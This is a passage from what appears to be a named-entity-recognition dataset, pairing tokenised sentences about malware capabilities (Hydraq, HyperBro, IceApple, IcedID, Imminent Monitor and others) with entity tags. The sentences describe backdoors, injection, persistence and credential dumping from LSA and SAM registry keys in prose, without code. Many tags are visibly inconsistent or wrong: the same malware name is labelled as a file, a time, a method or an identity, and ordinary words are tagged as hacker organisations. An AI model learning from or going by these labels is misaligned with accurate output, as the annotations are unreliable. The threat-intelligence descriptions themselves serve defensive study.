"HotCroissant", - "can", - "remotely", - "open", - "applications", - "on", - "the", - "infected", - "host", - "with", - "the", - "<code>ShellExecuteA</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "adjust", - "token", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "clear", - "all", - "system", - "event", - "logs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "read", - "data", - "from", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "connects", - "to", - "a", - "predefined", - "domain", - "on", - "port", - "443", - "to", - "exfil", - "gathered", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "check", - "for", - "the", - "existence", - "of", - "files,", - "including", - "its", - "own", - "components,", - "as", - "well", - "as", - "retrieve", - "a", - "list", - "of", - "logical", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "download", - "files", - "and", - "additional", - "malware", - "components." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "Registry", - "subkey", - "to", - "register", - "its", - "created", - "service,", - "and", - "can", - "also", - "uninstall", - "itself", - "later", - "by", - "deleting", - "this", - "value.", - "Hydraq's", - "backdoor", - "also", - "enables", - "remote", - "attackers", - "to", - "modify", - "and", - "delete", - "subkeys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "uses", - "basic", - "obfuscation", - "in", - "the", - "form", - "of", - "spaghetti", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "monitor", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "system", - "information,", - "such", - "as", - "CPU", - "speed,", - "from", - "Registry", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "includes", - "a", - "component", - "based", - "on", - "the", - "code", - "of", - "VNC", - "that", - "can", - "stream", - "a", - "live", - "feed", - "of", - "the", - "desktop", - "of", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "uses", - "svchost.exe", - "to", - "execute", - "a", - "malicious", - "DLL", - "included", - "in", - "a", - "new", - "service", - "group." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "load", - "and", - "call", - "DLL", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "C2", - "traffic", - "is", - "encrypted", - "using", - "bitwise", - "NOT", - "and", - "XOR", - "operations." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "information", - "such", - "as", - "computer", - "name,", - "OS", - "version,", - "processor", - "speed,", - "memory", - "size,", - "and", - "CPU", - "speed." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "retrieve", - "IP", - "addresses", - "of", - "compromised", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "a", - "backdoor", - "through", - "which", - "remote", - "attackers", - "can", - "monitor", - "services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Hydraq", - "creates", - "new", - "services", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "used", - "a", - "legitimate", - "application", - "to", - "sideload", - "a", - "DLL", - "to", - "decrypt,", - "decompress,", - "and", - "run", - "a", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "can", - "unpack", - "and", - "decrypt", - "its", - "payload", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "can", - "be", - "delivered", - "encrypted", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "delete", - "a", - "specified", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "run", - "an", - "application", - "(<code>CreateProcessW</code>)", - "or", - "script/file", - "(<code>ShellExecuteW</code>)", - "via", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "can", - "run", - "shellcode", - "it", - "injects", - "into", - "a", - "newly", - "created", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "take", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "start", - "and", - "stop", - "a", - "specified", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "the", - "ability", - "to", - "pack", - "its", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "can", - "list", - "all", - "services", - "and", - "their", - "configurations." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperBro", - "has", - "used", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "can", - "use", - "default", - "credentials", - "to", - "connect", - "to", - "IPC$", - "shares", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "can", - "connect", - "to", - "the", - "IPC$", - "share", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "can", - "enumerate", - "all", - "account", - "names", - "on", - "a", - "remote", - "share." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "can", - "add", - "the", - "name", - "of", - "its", - "communication", - "pipe", - "to", - "<code>HKLM\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\lanmanserver\\\\parameters\\NullSessionPipes</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "can", - "use", - "Windows", - "API's", - "<code>ConnectNamedPipe</code>", - "and", - "<code>WNetAddConnection2</code>", - "to", - "detect", - "incoming", - "connections", - "and", - "connect", - "to", - "remote", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HyperStack", - "has", - "used", - "RSA", - "encryption", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ISMInjector", - "uses", - "the", - "<code>certutil</code>", - "command", - "to", - "decode", - "a", - "payload", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ISMInjector", - "is", - "obfuscated", - "with", - "the", - "off-the-shelf", - "SmartAssembly", - ".NET", - "obfuscator", - "created", - "by", - "red-gate.com." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ISMInjector", - "hollows", - "out", - "a", - "newly", - "created", - "process", - "RegASM.exe", - "and", - "injects", - "its", - "payload", - "into", - "the", - "hollowed", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ISMInjector", - "creates", - "scheduled", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "encrypt", - "and", - "compress", - "files", - "using", - "Gzip", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "use", - "Base64", - "and", - "\"junk\"", - "JavaScript", - "code", - "to", - "obfuscate", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "harvest", - "credentials", - "from", - "local", - "and", - "remote", - "host", - "registries." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "collect", - "files,", - "passwords,", - "and", - "other", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "use", - "a", - "Base64-encoded", - "AES", - "key", - "to", - "decrypt", - "tasking." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "Active", - "Directory", - "Querier", - "module", - "can", - "perform", - "authenticated", - "requests", - "against", - "an", - "Active", - "Directory", - "server." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple's", - "Multi", - "File", - "Exfiltrator", - "module", - "can", - "exfiltrate", - "multiple", - "files", - "from", - "a", - "compromised", - "host", - "as", - "an", - "HTTP", - "response", - "over", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "delete", - "files", - "and", - "directories", - "from", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "Directory", - "Lister", - "module", - "can", - "list", - "information", - "about", - "files", - "and", - "directories", - "including", - "creation", - "time,", - "last", - "write", - "time,", - "name,", - "and", - "size." - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "is", - "an", - "IIS", - "post-exploitation", - "framework,", - "consisting", - "of", - "18", - "modules", - "that", - "provide", - "several", - "functionalities." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple's", - "Credential", - "Dumper", - "module", - "can", - "dump", - "LSA", - "secrets", - "from", - "registry", - "keys,", - "including:", - "`HKLM\\SECURITY\\Policy\\PolEKList\\default`,", - "`HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`,", - "and", - "`HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - ".NET", - "assemblies", - "have", - "used", - "`App_Web_`", - "in", - "their", - "file", - "names", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "use", - "reflective", - "code", - "loading", - "to", - "load", - ".NET", - "assemblies", - "into", - "`MSExchangeOWAAppPool`", - "on", - "targeted", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IceApple's", - "Credential", - "Dumper", - "module", - "can", - "dump", - "encrypted", - "password", - "hashes", - "from", - "SAM", - "registry", - "keys,", - "including", - "`HKLM\\SAM\\SAM\\Domains\\Account\\F`", - "and", - "`HKLM\\SAM\\SAM\\Domains\\Account\\Users\\*\\V`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "Result", - "Retriever", - "module", - "can", - "AES", - "encrypt", - "C2", - "responses." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "Server", - "Variable", - "Dumper", - "module", - "iterates", - "over", - "all", - "server", - "variables", - "present", - "for", - "the", - "current", - "request", - "and", - "returns", - "them", - "to", - "the", - "adversary." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "ifconfig", - "module", - "can", - "iterate", - "over", - "all", - "network", - "interfaces", - "on", - "the", - "host", - "and", - "retrieve", - "the", - "name,", - "description,", - "MAC", - "address,", - "DNS", - "suffix,", - "DNS", - "servers,", - "gateways,", - "IPv4", - "addresses,", - "and", - "subnet", - "masks." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "IceApple", - "OWA", - "credential", - "logger", - "can", - "monitor", - "for", - "OWA", - "authentication", - "requests", - "and", - "log", - "the", - "credentials." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "IceApple", - "can", - "use", - "HTTP", - "GET", - "to", - "request", - "and", - "pull", - "information", - "from", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "SSL", - "and", - "TLS", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "<code>ZwQueueApcThread</code>", - "to", - "inject", - "itself", - "into", - "remote", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "web", - "injection", - "attacks", - "to", - "redirect", - "victims", - "to", - "spoofed", - "sites", - "designed", - "to", - "harvest", - "banking", - "and", - "other", - "credentials.", - "IcedID", - "can", - "use", - "a", - "self", - "signed", - "TLS", - "certificate", - "in", - "connection", - "with", - "the", - "spoofed", - "site", - "and", - "simultaneously", - "maintains", - "a", - "live", - "connection", - "with", - "the", - "legitimate", - "site", - "to", - "display", - "the", - "correct", - "URL", - "and", - "certificates", - "in", - "the", - "browser." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "can", - "query", - "LDAP", - "to", - "identify", - "additional", - "users", - "on", - "the", - "network", - "to", - "infect." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "utilzed", - "encrypted", - "binaries", - "and", - "base64", - "encoded", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "the", - "ability", - "to", - "download", - "additional", - "modules", - "and", - "a", - "configuration", - "file", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "been", - "executed", - "through", - "Word", - "documents", - "with", - "malicious", - "embedded", - "macros." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "can", - "inject", - "itself", - "into", - "a", - "suspended", - "msiexec.exe", - "process", - "to", - "send", - "beacons", - "to", - "C2", - "while", - "appearing", - "as", - "a", - "normal", - "msi", - "application." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "called", - "<code>ZwWriteVirtualMemory</code>,", - "<code>ZwProtectVirtualMemory</code>,", - "<code>ZwQueueApcThread</code>,", - "and", - "<code>NtResumeThread</code>", - "to", - "inject", - "itself", - "into", - "a", - "remote", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "the", - "ability", - "to", - "identify", - "Workgroup", - "membership." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "established", - "persistence", - "by", - "creating", - "a", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "created", - "a", - "scheduled", - "task", - "that", - "executes", - "every", - "hour", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "packed", - "and", - "encrypted", - "its", - "loader", - "module." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "been", - "delivered", - "via", - "phishing", - "e-mails", - "with", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "embedded", - "binaries", - "within", - "RC4", - "encrypted", - ".png", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "the", - "ability", - "to", - "identify", - "the", - "computer", - "name", - "and", - "OS", - "version", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "obfuscated", - "VBA", - "string", - "expressions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "HTTPS", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IcedID", - "has", - "used", - "WMI", - "to", - "execute", - "binaries." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "remote", - "microphone", - "monitoring", - "capability." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "CommandPromptPacket", - "and", - "ScriptPacket", - "module(s)", - "for", - "creating", - "a", - "remote", - "shell", - "and", - "executing", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "PasswordRecoveryPacket", - "module", - "for", - "recovering", - "browser", - "passwords." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "decoded", - "malware", - "components", - "that", - "are", - "then", - "dropped", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "feature", - "to", - "disable", - "Windows", - "Task", - "Manager." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "uploaded", - "a", - "file", - "containing", - "debugger", - "logs,", - "network", - "information", - "and", - "system", - "information", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "deleted", - "files", - "related", - "to", - "its", - "dynamic", - "debugger", - "feature." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "dynamic", - "debugging", - "feature", - "to", - "check", - "whether", - "it", - "is", - "located", - "in", - "the", - "%TEMP%", - "directory,", - "otherwise", - "it", - "copies", - "itself", - "there." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "dynamic", - "debugging", - "feature", - "to", - "set", - "the", - "file", - "attribute", - "to", - "hidden." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "a", - "keylogging", - "module." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "leveraged", - "CreateProcessW()", - "call", - "to", - "execute", - "the", - "debugger." - ], - "ner_tags": [ - "B-Time", - "B-SecTeam", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Imminent", - "Monitor", - "has", - "encrypted", - "the", - "spearphish", - "attachments", - "to", - "avoid", - 